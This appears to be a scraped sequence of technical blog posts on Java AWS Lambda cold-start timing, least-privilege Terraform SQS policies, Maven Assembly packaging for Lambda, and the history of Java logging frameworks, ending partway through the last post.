<p> The question posed a situation where one Lambda invoked another, which did nothing. The asker seemed particularly concerned by the time taken by the first function: 6000+ milliseconds when cold, 300 when warm. Rather than set up an identical situation, I'm going to use a simpler example, retrieving a list of CloudWatch log groups. The execution time, as you'll see, is similar.
<p> Before getting started, I want to clarify terminology. When I use the term “cold,” I refer to a Lambda that's just been deployed. The execution time in this case consists of the time to <a href="https://docs.aws.amazon.com/lambda/latest/dg/runtimes-context.html#runtimes-lifecycle" target="_blank">initialize the Lambda runtime</a>, initialize the Java Virtual Machine (JVM), and execute the Lambda's handler function. By comparison, a “warm” invocation is able to use an existing execution environment, so only includes the time to execute the handler function.
<p> OK, on to Teh Codez:
<pre class="codeSample">
public void handler(Object ignored, Context context)
{
long start = System.currentTimeMillis();
AWSLogs client = AWSLogsClientBuilder.defaultClient();
long clientCreated = System.currentTimeMillis();
client.describeLogGroups();
long apiInvoked = System.currentTimeMillis();
System.err.format("time to create SDK client = %6d\n", (clientCreated - start));
System.err.format("time to make API call = %6d\n", (apiInvoked - clientCreated));
}
</pre>
<p> This is an extremely simple Lambda: it creates an AWS SDK client and then uses that client to invoke an API call. Before each of these actions I retrieve the current system time. How long can it take?
<h2> Setting a Baseline </h2>
<p> People like to say things are “slow.” But that term is meaningless if you don't have context. And to develop that context, you have to know both what is happening, and the physical constraints that apply. For example, on my 100 Mbit/sec Internet connection, it should take a little over 80 seconds to download a gigabyte of data. That feels like a really long time if you're waiting for the file to download, but it's not slow. If that same file takes 5 minutes to download over the same connection, it's reasonable to say that it's slow, to try to figure out why, and to attempt to correct it.
<p> If you look at the example code, you might think that it should execute instantaneously. After all, it's just two operations. If you have think about the fact that at least the second operation makes a network call, you might say that it should take 100 milliseconds or so.
<p> But observations are always better than guesses. Running on my laptop, with an Intel i7-6500U CPU at 2.5 GHz, here's how long it takes (to get these numbers I created a <code>main()</code> that just invokes the handler function):
<pre class="codeSample">
time to create SDK client = 744
time to make API call = 469
</pre>
<p> That's … much longer than one might expect. Over a second. To make sure it isn't a fluke, you should run the code several times. You should also try some other variants of the code. For example, call the handler function twice in a row:
<pre class="codeSample">
time to create SDK client = 702
time to make API call = 522
time to create SDK client = 21
time to make API call = 151
</pre>
<p> Hmmmm. The time to create the client dropped dramatically. The time to make the API call also dropped, and is closer to what I'd expect from a network service call. At this point I might also use the Linux <code>time</code> command:
<pre class="codeSample">
> time java -jar target/sandbox-lambda-java-1.0-SNAPSHOT.jar
time to create SDK client = 576
time to make API call = 623
real 0m1.320s
user 0m2.130s
sys 0m0.113s
</pre>
<p> The “real” value is also known as “wall clock” time: it's what I'm measuring by saving timestamps, and it's pretty close to the timings I print from within the program. The “user” time is the actual CPU time consumed by the program; it's nearly twice the real time, which indicates that the CPU is doing a lot of work. If the program was spending all of its time making network calls, that user time should be less than the real time.
<p> This information alone is enough to make a first pass at optimization.
<h2> Memory Allocation </h2>
<p> When you create a Java Lambda using the Console, you get a default memory allocation of 512 MB. While Java has a <a href="https://stackoverflow.com/a/561450" target="_blank">not always deserved</a> reputation for excessive memory consumption, this is more than enough to run the example program. In fact, if you look at the post-run statistics, you'll see that “Max memory used” is around 150 MB.
<p> However, maximum memory consumption only tells part of the story. A much — <em>much</em> — more important fact is that <a href="https://docs.aws.amazon.com/lambda/latest/dg/configuration-memory.html" target="_blank">Lambda provides CPU in proportion to allocated memory</a>. To get one virtual CPU, you need to allocate 1,769 MB of memory to your function. The AWS docs don't provide a table of how much CPU you'd get for a given memory size, but assuming a linear relationship, 512 MB would be a third of a CPU — a <em>virtual</em> CPU of unspecified performance.
<p> The table below compares timings for different memory allocations. These are all “cold” times: before each test I uploaded the deployment bundle, which forced Lambda to create a new execution environment. I invoked the Lambda from the Console, providing a dummy event. For consistency with the previous numbers, times are in milliseconds.
<table>
<tr> <td> </td>
<th align="right"> 512 MB </th>
<th align="right"> 1024 MB </th>
<th align="right"> 2048 MB </th>
<th align="right"> 4096 MB </th>
</tr>
<tr> <td> Create client </td>
<td align="right"> 5298 </td>
<td align="right"> 2493 </td>
<td align="right"> 1272 </td>
<td align="right"> 1019 </td>
</tr>
<tr> <td> Invoke API call </td>
<td align="right"> 3844 </td>
<td align="right"> 2023 </td>
<td align="right"> 1061 </td>
<td align="right"> 613 </td>
</tr>
<tr> <td> Billed duration </td>
<td align="right"> 9213 </td>
<td align="right"> 4555 </td>
<td align="right"> 2349 </td>
<td align="right"> 1648 </td>
</tr>
</table>
<p> If you add up the numbers, you'll see that the billed duration is slightly larger than the sum of the two recorded times. I believe this corresponds to the time taken to start the JVM and invoke the handler function (much like running on my laptop took 1320 ms total, but only 1199 was accounted for by my timestamps).
<p> These numbers also omit the Lambda initialization time, which was approximately 500 ms. This is the time taken to start the Lambda's container, download the function code onto the container, and start the runtime environment. You aren't billed for this time, but it does affect the response time of the function, and Java Lambdas seem to take much longer than, say Python (where initialization takes around 150 milliseconds).
<p> Based on what we know from the baseline performance test, the numbers make sense: at 4096 MB we have the equivalent of slightly more than two virtual CPUs, and the execution times are in line with what I saw running on my laptop (for what it's worth, increasing the memory size to 8192 MB, which should be 4+ vCPUs, does not significantly affect these timings). This leads to my number one rule for Lambda performance tuning:
<p align="center"> <strong> The most important thing that you can do to improve Lambda performance is increase memory allocation. </strong>
<p> This advice is, of course, subject to caveats. This example program is short, has high CPU usage relative to its runtime, and can exploit multiple virtual CPUs. A long-running Lambda that spends most of its time waiting for network calls may not benefit as much from the CPU boost.
<p> However, almost any Java Lambda will benefit from increased memory allotment as a result of garbage collection: the less memory you give it, the more often collection has to run. I added some code to track garbage collection time, and the 512 MB run consumed nearly 200 milliseconds, versus 30 for the 4096 MB run. Again, this depends on what the program is doing, but in general a larger heap means that more of the program's garbage will never make it out of the “young” generation, which can be collected more efficiently than the “tenured” generation.
<h2> Classloading </h2>
<p> So what's consuming all of the CPU time for this Lambda? At least part of the answer is classloading: to run this simple program, the JVM loads 3,329 classes.
<p> The JVM loads classes on-demand. It won't load the <code>AWSLogsClientBuilder</code> class until it it executes the line that calls <code>defaultClient()</code>. Loading and initializing a class require loading any classes that it depends on, and so on. Even though an individual class can be loaded very quickly, the total classloading time adds up.
<p> Unfortunately, there aren't a lot of ways to avoid this cost, especially in a simple program like the example. The <a href="https://blog.gilliard.lol/2017/10/02/JVM-startup.html" target="_blank">tricks available to stand-alone Java programs</a> aren't available in Lambda.
<p> However, for real-world applications you can make architectural choices that minimize the number of classes that need to be loaded. One of the simplest is to avoid large frameworks such as Spring.
<h2> A Different SDK </h2>
<p> Another possibility might be to replace the standard AWS SDK with something that loads fewer classes. In November 2018 AWS released version 2 of its Java SDK, which is described as “major rewrite of the version 1.x code base.” You'll occasionally see recommendations to use it for improved performance (including in the <a href="https://docs.aws.amazon.com/sdk-for-java/latest/migration-guide/whats-new.html" target="_blank">SDK docs themselves</a>, via a link that doesn't go anywhere).
<p> But, as I said before, there's no substitution for observation. Here are the numbers using version 2.15.53:
<table>
<tr> <td> </td>
<th align="right"> 512 MB </th>
<th align="right"> 1024 MB </th>
<th align="right"> 2048 MB </th>
<th align="right"> 4096 MB </th>
</tr>
<tr> <td> Create client </td>
<td align="right"> 4965 </td>
<td align="right"> 2278 </td>
<td align="right"> 1141 </td>
<td align="right"> 959 </td>
</tr>
<tr> <td> Invoke API call </td>
<td align="right"> 4235 </td>
<td align="right"> 2062 </td>
<td align="right"> 1047 </td>
<td align="right"> 661 </td>
</tr>
<tr> <td> Billed duration </td>
<td align="right"> 9237 </td>
<td align="right"> 4357 </td>
<td align="right"> 2204 </td>
<td align="right"> 1637 </td>
</tr>
</table>
<p> No meaningful change. To be fair, I just used the default configuration. The v2 SDK lets you change out the underlying HTTP implementation, so maybe a different one would give better numbers. But that seems like a lot of work for “maybe.”
<p> For that matter, switching to the v2 SDK requires a signficant amount of tedious recoding to change package and method names. And as-of this writing, there are still some features that aren't supported by v2. So I don't recommend making that switch until and unless there's a compelling reason.
<h2> Packaging </h2>
<p> Earlier this year <a href="https://blog.kdgregory.com/2020/07/packaging-java-for-aws-lambda.html" target="_blank">I wrote an article about the different ways to package a Java Lambda</a>. In that article I explored why the Lambda documentation recommended against using an “UberJar” produced by the Maven Shade plugin — even though that same documentation uses that plugin for examples. However, I didn't record the performance gained by switching to the Assembly plugin.
<p> Here's that comparison. I've taken the billed duration from the previous table, and compared it to the billed duration when packaged via the assembly plugin. Rather than show all of the memory sizes, I just show the two extremes:
<table>
<tr> <td> </td>
<th align="right"> 512 MB </th>
<th align="right"> 4096 MB </th>
</tr>
<tr> <td> Shade Plugin </td>
<td align="right"> 9213 </td>
<td align="right"> 1648 </td>
</tr>
<tr> <td> Assembly Plugin </td>
<td align="right"> 8138 </td>
<td align="right"> 1358 </td>
</tr>
</table>
<p> So, a decent speedup with a small memory allocation (which I hope you woudn't use after reading this post!), and a minor speedup when you have plenty of memory (and CPU). Still, any speedup is a good speedup, and this requires little effort.
<h2> Provisioned Concurrency </h2>
<p> On Stack Overflow, the typical answer to people who are concerned about first-run execution time is “use Provisioned Concurrency.” I suspect that the people who say this have never actually used provisioned concurrency, because it's not a silver bullet. In fact, if you enable provisioned concurrency for my example program, <em>you'll see no change in first-run execution time.</em>
<p> The reason is that my example does everything inside its handler function, and so incurs all of the cost of classloading and initialization when that function executes. Provisioned concurrency won't help with that.
<p> To make Provisioned Concurrency help with Java first-start times, you need to move all of the code that triggers classloading and initialization into a constructor (or a static initializer, but trust me, <a href="https://blog.kdgregory.com/2012/03/static-variables-considered-harmful.html" target="_blank">don't go there</a>). This adds to the complexity of your Lambda, because you have to ensure that you fully load the SDK (and other) classes that you need to run, without actually changing anything (you don't want to write bogus data to your production DynamoDB table!).
<p> Assuming that you've gotten everything working, you'll still have the “N + 1” problem: unless you dramatically over-provision, you'll still get the occasional cold start. Perhaps it happens first thing in the morning, when all of your users connect for the first time. Or perhaps it happens when your site gets mentioned on Hacker News. Sooner or later, it will happen.
<p> Finally, there's the matter of cost: with Provisioned Concurrency, you are paying for an always-on machine. In my example, with 4 GB allocated to the Lambda, enabling Provisioned Concurrency would cost approximately $45/month <em>in addition to the per-request cost</em>. It's hard to find an exact equivalent in the EC2 world, but a t3.medium has the same memory and virtual CPU count, and costs a little over $30 per month (both prices are for us-east-2). So if you're planning to replace your “traditional” Java web-app with Lambdas to save costs, you'll get the opposite.
<h2> Wrapping Up </h2>
<p> <a href="https://github.com/kdgregory/example-lambda-java/tree/86b59c2caacbf7ebf333f70e6e8e02d398066d51" target="_blank">I first implemented a Lambda web-app with Java</a> nearly four years ago, and my opinion hasn't changed since then: if you need fast response times, then Java should not be your language of choice. Use Python, or NodeJS, or Go. Or if you must use Java, but want the benefits of Serverless computing, deploy it on ECS Fargate as a traditional J2EE application with embedded Jetty server.
<p> That doesn't mean that Java is always a bad choice for Lambdas. If you have a long-running task, such as processing large files, then startup time pales in comparison to overall runtime. And Java is an especially good choice for CPU-intensive tasks, because the Hotspot engine will optimize performance.
<p> The bottom line is that writing your Lambda functions in Java, like everything else in software engineering, is a tradeoff. Pick your application architecture based on your actual needs, not philosophical stances.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-87101982982223856522020-11-09T07:59:00.004-05:002020-11-11T06:57:12.621-05:00Building Modular Inline Policies with Terraform<p> Modules are the primary mechanism for reusability in Terraform. They're especially useful in cases where you need to stamp out a bunch of related resources multiple times. <a href="https://gist.github.com/kdgregory/bedda496da1e6b99984ef6c5d58946b4" target="_blank">For example</a>, an SQS queue along with its dead-letter queue and “least privilege” access policies.
<p> The problem with creating a separate managed policy for each module invocation is that role/policy attachments are a limited resource: by default, you're limited to <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html#reference_iam-quotas-entities" target="_blank">ten</a>. You can increase that by opening a support ticket, but the limit is still low (20 unless you can show special circumstances), and it has to be done in every account where you'll create the role.
<p> Alternatively, you can construct a combined policy in the invoking module as long as the child module outputs the queue ARNs. However, this eliminates much of the benefit of reusability, as you have to explicitly build the combined policy everywhere that you use the queue module. It also means that the person writing the combined policy has to understand the IAM permissions that are appropriate to a queue consumer or producer. At that point, why not just explicitly create your resources?
<p> In this post, I look at a different alternative: the queue module exports the JSON for the producer and consumer <em>statements</em>. The invoking module then combines the statements for each of its queues into a single applicaton policy.
<h1> Wait, doesn't Terraform allow you to combine policies? </h1>
<p> Not in the way that I want.
<p> The <a href="https://registry.terraform.io/providers/hashicorp/aws/latest/docs/data-sources/iam_policy_document" target="_blank">iam_policy_document</a>
data source allows you to “layer” policies using its <code>source_json</code>
and <code>override_json</code> arguments, but these only accept a single document. Which
means that you can build a complex policy document step by step, but not as a
single data source. In a real-world configuration, I think that would quickly turn
into an unmaintainable mess.
<p> The <a href="https://learn.hashicorp.com/tutorials/terraform/aws-iam-policy" target="_blank">policy documents guide</a>
doesn't give any other alternatives: it recommends the data source or a
multi-line “heredc”. Surprisingly, it doesn't mention using
<code>jsonencode()</code> at all.
<h1> Creating an SQS queue module </h1>
<p> A modern web-application is a complex beast: it often consists of a (relatively) simple API server, with background processes to handle long-running tasks such as sending notifications, rendering images, or generating reports. And linking these together, at least on AWS, SQS queues.
<p> An SQS queue, although it seems simple, actually has a lot of hidden complexity:
<ul>
<li> Each queue should have a companion dead-letter queue, along with a "redrive policy" that determines how many times a consumer can fail to process a message before it goes to the dead-letter queue.
<li> How long a does a consumer have to process a message before it's retried (the visibility timeout).
<li> How long can a message stay in the queue without being picked up (the retention period, used to prevent queues from growing without bound when there are no/insufficient consumers).
<li> You should also have “least-privilege” policies for the queue's producers and consumers.
</ul>
<p> This is a perfect use for Terraform modules: rather than repeat all of the resource definitions (as you have to do with CloudFormation), you simply create a module and reference it from your main configuration:
<pre class="codeSample">
module "notifications_queue" {
source = "./modules/sqs"
queue_name = "Notifications"
}
module "reports_queue" {
source = "./modules/sqs"
queue_name = "ReportGeneration"
visibility_timeout = 600
receive_count = 1
}
</pre>
<p> The core of this module are the following two resource definitions, for the primary queue and its companion dead-letter queue (every primary should have a DLQ; trust me, you'll want it sooner or later):
<pre class="codeSample">
resource "aws_sqs_queue" "base_queue" {
name = var.queue_name
message_retention_seconds = var.retention_period
visibility_timeout_seconds = var.visibility_timeout
redrive_policy = jsonencode({
"deadLetterTargetArn" = aws_sqs_queue.deadletter_queue.arn,
"maxReceiveCount" = var.retry_count
})
}
resource "aws_sqs_queue" "deadletter_queue" {
name = "${var.queue_name}-DLQ"
message_retention_seconds = var.retention_period
visibility_timeout_seconds = var.visibility_timeout
}
</pre>
<p> As you can see, all configuration is via module variables. Rather than show the entire <code>variables.tf</code> file, I'll use just two to give you a sense of my philosophy. The first, of course, is <code>queue_name</code>: this is the name of the queue, and can't be defaulted. The second, <code>retention_period</code>, is something that most consumers don't care about, but some <em>might</em>. So I picked a valid default (in my experience most messages have no value after 24 hours), and the invoking module can override if needed.
<pre class="codeSample">
variable "queue_name" {
description = "The name of the queue. Used as a prefix for related resource names."
type = string
}
variable "retention_period" {
description = "Time (in seconds) that messages will remain in queue before being purged"
type = number
default = 86400
}
</pre>
<p> So far, nothing unusual. But what I'm not showing (yet) are the policy documents that let your applications read and write the queue.
<p> If you were just building a proof-of-concept, you might consider using the pre-existing <code>AmazonSQSFullAccess</code> managed policy. However, that policy grants <em>all</em> operations on <em>all</em> queues. Not just read and write, but the ability to create and delete them as well. For a real-world application, you want a “least privilege” policy that only allows actions on the queue that you've just created. And really, you want separate policies for the programs that write to the queue and those that read from the queue. To support this, my module also creates two managed policies; here's the producer policy:
<pre class="codeSample">
resource "aws_iam_policy" "producer_policy" {
name = "SQS-${var.queue_name}-${data.aws_region.current.name}-consumer_policy"
description = "Attach this policy to producers for ${var.queue_name} SQS queue"
policy = data.aws_iam_policy_document.producer_policy.json
}
data "aws_iam_policy_document" "producer_policy" {
statement {
actions = [
"sqs:GetQueueAttributes",
"sqs:GetQueueUrl",
"sqs:SendMessage",
"sqs:SendMessageBatch"
]
resources = [
aws_sqs_queue.base_queue.arn
]
}
}
</pre>
<p> Simple, but as I said above, there's a limit on the number of policies that you can attach to a single role. In a real-world micro-service application, you might have a half-dozen queues. Or more.
<h1> Extracting the Policy Statement </h1>
<p> I originally created this example for a <a href="https://www.kdgregory.com/misc/presentations/2020-06-18-gpawsug-infrastructure_tools.pdf" target="_blank">user group talk</a>, so while it was based on real-world experience it wasn't actually used in the real world. I recently had to implement an SQS module for the real world, and decided to tackle the “too many policies” problem (ironically, I don't think it will be a problem for that specific use case).
<p> After reviewing the various documents linked above, I realized that none of them mentioned the <a href="https://www.terraform.io/docs/configuration/functions/jsonencode.html" target="_blank">jsonencode</a> function. This seemed like a rather strange omission, especially given the inclusion of approaches based on string literals (although not nearly as bad as XML, JSON still has its share of gotchas for those who wish to write it using strings).
<p> As it turns out, creating policy documents with <code>jsonencode()</code> instead of using a data source works quite well:
<pre class="codeSample">
resource "aws_iam_policy" "producer_policy" {
name = "SQS-${var.queue_name}-${data.aws_region.current.name}-producer"
description = "Attach this policy to producers for ${var.queue_name}"
policy = jsonencode({
"Version" = "2012-10-17",
"Statement" = [{
"Effect" = "Allow",
"Action" = [
"sqs:GetQueueAttributes",
"sqs:GetQueueUrl",
"sqs:SendMessage",
"sqs:SendMessageBatch"
],
"Resource" = [
aws_sqs_queue.base_queue.arn
]
}]
})
}
</pre>
<p> That was a start, but it wasn't really where I wanted to go. The next step was to move the JSON into a local:
<pre class="codeSample">
locals {
producer_policy_statement = {
"Effect" = "Allow",
"Action" = [
"sqs:GetQueueAttributes",
"sqs:GetQueueUrl",
"sqs:SendMessage",
"sqs:SendMessageBatch"
],
"Resource" = [
aws_sqs_queue.base_queue.arn
]
}
}
</pre>
<p> Now I could make the policy reference the local, rather than either inline JSON or a datasource:
<pre class="codeSample">
resource "aws_iam_policy" "producer_policy" {
name = "SQS-${var.queue_name}-${data.aws_region.current.name}-producer"
description = "Attach this policy to producers for ${var.queue_name}"
policy = jsonencode({
"Version" = "2012-10-17",
"Statement" = [local.producer_policy_statement]
})
}
</pre>
<h1> Constructing an application role </h1>
<p> That's all well and good, but how does it provide any benefit over the former self-contained module? The answer is that you can reference the JSON in <code>outputs.tf</code>:
<pre class="codeSample">
output "producer_policy_statement" {
value = local.producer_policy_statement
}
</pre>
<p> And that enables the following change in the invoking module: rather than a bunch of role/policy attachments, the application role combines these snippets of JSON into an inline policy.
<pre class="codeSample">
resource "aws_iam_role" "application_role" {
name = "ApplicationRole"
assume_role_policy = # you saw this above, no need to repeat
}
resource "aws_iam_role_policy" "application_role_queue_policy" {
name = "application_role_queue_policy"
role = aws_iam_role.application_role.id
policy = jsonencode({
"Version" = "2012-10-17",
"Statement" = [
module.notifications_queue.producer_policy_statement,
module.rendering_queue.producer_policy_statement,
module.reports_queue.producer_policy_statement
]
})
}
</pre>
<p> Now, rather than counting against your quota of policy attachments, these statements count against your quote for inline policy size. Which, for role policies, is 10,240 characters. If that's too low, you can create managed policies composed of individual statements, for a total of nearly 70k per role (10 policies at 6k each, and one inline policy). If your application needs a role that's more complex than that, you might want to think about breaking it into micro-services.
<p> But in my opinion, the best feature of this implmentation is that it keeps the module as the arbiter of its resource's permissions. Which means there's less of a risk that a poorly crafted policy will open your system to an attacker.
<p> If you'd like to try this out, I've saved both the <a href="https://gist.github.com/kdgregory/bedda496da1e6b99984ef6c5d58946b4" target="_blank">original</a> and the <a href="https://gist.github.com/kdgregory/54ca643f3ab6021679cfddb1d9401062" target="_blank">modular</a> versions as GitHub Gists. One thing to note: Gists don't have any conception of sub-directories, and don't allow slashes in filenames, so I've used dashes to indicate directory boundaries (this should be clear once you look at the files).
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-27786173857734669562020-07-04T08:33:00.001-04:002020-07-04T08:33:34.087-04:00Packaging Java for AWS Lambda<p> When I want to package a Java application in a single JAR with all of its dependencies,
I normally turn to Maven’s <a href="http://maven.apache.org/plugins/maven-shade-plugin/"
target="_blank">Shade</a> plugin. This plugin builds an “UberJAR” by unpacking all of
the files from the project's dependencies and repackaging them into a single JAR.
<p> The Shade plugin is also used by the <a href="https://docs.aws.amazon.com/lambda/latest/dg/java-package.html"
target="_blank">Lambda Developer's Guide</a>. I was surprised, then to see
this later in <a href="https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html"
target="_blank">the same guide</a>:
<blockquote>
<b>Reduce the time it takes Lambda to unpack deployment packages</b> authored in Java by putting
your dependency .jar files in a separate /lib directory. This is faster than putting all
your function’s code in a single jar with a large number of .class files.
</blockquote>
<p> I was surprised because a single JAR containing class files <em>should</em> be the most
efficient way to deploy a project. The JVM <a href="https://www.kdgregory.com/index.php?page=java.byteBuffer#mapped_files"
target="_blank">memory-maps</a> the JAR files on its classpath, which means that it can
access arbitrary parts of those files without an explicit call to the OS kernel. And
UberJAR means that the JVM only has to examine a single directory structure.
<p> After some investigation, I discovered the reason: Lamdba unpacks the contents of the
deployment package into its filesystem. Which means that an UberJAR turns into a lot
of little files, each of which must be read using several kernel calls.
<p> OK, so if you’re a Maven user, how do you package your Lambdas in the prefered way? The
answer is that instead of using the Shade plugin, you use the <a href="http://maven.apache.org/plugins/maven-assembly-plugin/"
target="_blank">Assembly</a> plugin. The stated goal of this plugin is to allow developers
to package their project artifact with related information such as a website. But it's a
very flexible plugin, using a “deployment descriptor” to specify which files
should be included in the final artifact, and where they should go.
<p> This is the descriptor that I used for my <a href="https://github.com/kdgregory/example-lambda-java"
target="_blank">Java Lambda example</a>. It's duplicated for each of the Lambdas, and is
found at <code>src/assembly/deployment.xml</code>:
<pre class="codeSample">
<assembly xmlns="http://maven.apache.org/ASSEMBLY/2.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/ASSEMBLY/2.0.0 http://maven.apache.org/xsd/assembly-2.0.0.xsd">
<id>deployment</id>
<includeBaseDirectory>false</includeBaseDirectory>
<formats>
<format>zip</format>
</formats>
<dependencySets>
<dependencySet>
<outputDirectory>/lib</outputDirectory>
<useProjectArtifact>true</useProjectArtifact>
<unpack>false</unpack>
<scope>runtime</scope>
</dependencySet>
</dependencySets>
</assembly>
</pre>
<p> The descriptor is simple: it says that every JAR used by the Lambda — including
the one built by the project itself — should be stored in the <code>/lib</code>
directory of the final artifact. To use it, I replace the Shade configuration in my POM
with this (the <code>plugin.assembly.version</code> property defined as <code>3.2.0</code>):
<pre class="codeSample">
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-assembly-plugin</artifactId>
<version>${plugin.assembly.version}</version>
<configuration>
<descriptors>
<descriptor>src/assembly/deployment.xml</descriptor>
</descriptors>
</configuration>
<executions>
<execution>
<phase>package</phase>
<goals>
<goal>single</goal>
</goals>
</execution>
</executions>
</plugin>
</pre>
<p> And that's it: when I run <code>mvn package</code> I get a file in my <code>target</code>
directory with the suffix <code>-deployment.zip</code>.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-33516524658398425362020-06-21T08:18:00.003-04:002020-09-13T08:12:45.437-04:00A History of Java Logging Frameworks, or, Why Commons-Logging is Still So Common<p> In the beginning there was <code>System.out.println()</code>. Or, for those of us who were purists (or wanted our output immediately), <code>System.err.println()</code>. And every developer had his or her own preferences for how their log messages would appear, leading to some very messy output as the number of developers on a team increased.
<p> To bring order to this chaos, many projects implemented their own logging framework. I worked on one such project in the late 90s: the framework consisted of a single class that implemented a static <code>log()</code> method. I can't remember what the logging output looked like, but I suspect that it included a consistently-formatted timestamp.
<p> According to <a href="https://www.javaworld.com/article/2076243/log4j-delivers-control-over-logging.html" target="_blank">this article by Ceki Gülcü</a>, a project that he was working on in 1996 also implemented their own logging framework. But unlike the project I worked on, its framework was released to the public in 1999 as Log4J.
<p> Something else that became public in 1999 was the <a href="http://mail-archives.apache.org/mod_mbox/jakarta-announcements/199910.mbox/%3C025301bf1824%24dd9e6da0%24a447fea9%40paris%3E" target="_blank">Jakarta project</a>, a collaboration between Sun and the Apache Software Foundation to produce the Tomcat application server. And of course Tomcat, being a large application with contributions by many people, had its own logging framework (and it <a href="https://tomcat.apache.org/tomcat-9.0-doc/logging.html" target="_blank"> still does</a>, although the implementation and purpose has changed over time).
<p> And lastly, 1999 was also the year that <a href="https://jcp.org/en/jsr/detail?id=47" target="_blank">JSR 047</a>, the Java Logging API Specification, was released. It turned into the <code>java.util.logging</code> (JUL) package, released as part of JDK 1.4 in 2002.
<p> A plethora of logging frameworks isn't a problem if you're an application developer: you pick one and stick with it. If you're developing a library that might be used by those applications, however, it's a nightmare. If your library uses Log4J and the application uses JUL, then the output becomes a mess and the developers using your library complain.
<p> At the time, the Jakarta project was arguably the largest single producer of libraries for Java application developers, so they added another: <a href="https://commons.apache.org/proper/commons-logging/" target="_blank">Jakarta Commons Logging</a> (since renamed to Apache Commons Logging, but you'll still see the initials "JCL" in the documentation). The idea of Commons Logging was that you would write your code against the JCL API, add the JCL JAR to your dependencies, and it would figure out what actual logging framework you were using.
<p> Although Commons Logging was intended for libraries, application developers adopted it as well. I can't speak for anyone else, but I looked at it as “won't hurt, and means I don't need to keep track of multiple APIs.” Unfortunately, some developers discovered that it <em>could</em> hurt: they were using Tomcat, regularly redeploying their applications, and had memory leaks that would eventually cause Tomcat to stop working.
<p> <a href="https://cwiki.apache.org/confluence/display/COMMONS/Commons+Logging+FUD" target="_blank">Looking back</a>, it appears that these leaks were due to missing transitive dependencies in the deployment bundle.<a href="#footnote1">*</a> This took place in the days before Maven 2, when developers were responsible for identifying every JAR that went into their application, and ensuring that it somehow got there (which often meant lots of JARs checked into source control). It wouldn't be obvious that a library used Commons Logging, so the application developer wouldn't bother to add it to the deployed WAR. Unfortunately, Tomcat made it available on the system classpath (because it used Commons Logging internally), so the developers never knew they were missing the JAR. And since Commons Logging needed to know about the actual deployed logging framework, it would establish a strong reference to the Log4J implementation that <em>was</em> in the WAR, preventing the classloader from unloading the classes belonging to the WAR.
<p> That problem was rather quickly resolved: Commons Logging version 1.1 was released in 2006, Tomcat 6 moved it off the public classpath (although Tomcat 5 remained “in the wild” for quite some time), and Maven 2 ensured that a WAR would contain all of the dependencies that it needed. But developers have very long memories for things that go wrong, especially things that happened to someone else who blogged about it.<a href="#footnote2">**</a>
<p> At the same time, several popular Java frameworks appeared; Hibernate in 2001 and Spring in 2002 are two of the most familiar. These frameworks were complex enough to need logging, but for obvious reasons wouldn't want to be tied to a specific implementation. Commons Logging provided that capability (and thus became an untracked dependency for many builds).
<p> Moving forward, the new millennium saw continued change in the logging world. Log4J became an Apache project. Ceki Gülcü left Apache and developed Logback and SLF4J. And in the early 2010s, the remaining Apache Log4J committers decided that the Log4J 1.x implementation couldn't be extended and completely rewrote it as Log4J 2.x.
<p> Of these, SLF4J is particularly interesting because it was a logging facade, in direct competition with Commons Logging. Unlike Commons Logging, which tried to infer what underlying framework you were using, SLF4J required you to explicitly include “bridge” JARs for your actual implementation. SLF4J also provided additional features, such as formatted log messages, that were very attractive to application developers.
<p> However, adopting SLF4J had its own pain point: if you used Spring (or Hibernate, or any other library that dependent on Commons Logging), Maven would add it to your build as a transitive dependency. Where it might take precedence over the “slf4j-jcl” bridge from SLF4J (it all depended on the order that JARs were given to the classloader). A key feature of Maven POMs from this era are multiple <code><exclusions></code> to prevent such transitive dependencies.
<p> So here we are in 2020, and the logging frameworks scene is more complex than ever:
<ul>
<li> Log4J 1.x is still used by many projects, even though it was officially <a href="https://blogs-he-de.apache.org/foundation/entry/apache_logging_services_project_announces" target="_blank">end-of-lifed</a> in 2015. One of its most useful features <a href="https://blogs.apache.org/logging/entry/moving_on_to_log4j_2" target="_blank"> doesn't work under Java 9</a> (and, I presume, later versions), so its popularity may fade (although it seems that many people, particularly those using OpenJDK, are quite happy with Java 8).
<li> SLF4J/Logback is still used by many developers (including myself), even though new releases seem to have stalled at the 1.3.0-alpha stage (after 25 years of writing logging frameworks, I'm guessing Ceki is in need of a break).
<li> Log4J 2.x provides “bridge” JARs that let people use Commons Logging and SLF4J as their API, with Log4J2 as the back-end.
<li> Commons Logging still exists, but hasn't seen a release since 2014. Nor has its list of supported frameworks changed: Log4J 1.x, JUL, and Avalon LogKit.
</ul>
<p> Perhaps counter-intuitively, even with all of these changes, Commons Logging is still used by many libraries. However, it's become less visible. Spring Framework, for example, implements the API internally; as an application developer, you no longer need to explicitly exclude the JAR. And if you use Spring Boot, its <a href="https://search.maven.org/artifact/org.springframework.boot/spring-boot-dependencies/2.3.1.RELEASE/pom" target="_blank">a 3,000+ line dependency-management POM</a> will explicitly exclude Commons Logging from the libraries that use it.
<p> If you're developing a library, I think that Commons Logging is still the best choice for internal logging. It provides a consistent interface, and it's reasonable to expect that the consumers of your library already have the bridge JARs that they need (which might mean the internal implementation in Spring Framework). But there are a few best practices to keep your users from cursing you:
<ul>
<li> Mark your dependency as <a href="http://maven.apache.org/guides/introduction/introduction-to-dependency-mechanism.html#dependency-scope" target="_blank"><code>provided</code></a>. This tells Maven (or Gradle, or any of the other tools that follow the Maven standard) not to resolve the transitive dependency; it will rely instead on an explicitly-referenced JAR to provide the necessary classes.
<li> Ensure that you don't establish a transitive dependency via a package that you depend on, like HTTP Components. Take the time to look at your entire dependency tree (using <code>mvn dependency:tree</code> or equivalent), and add an exclusion if anything tries to pull in Commons Logging.
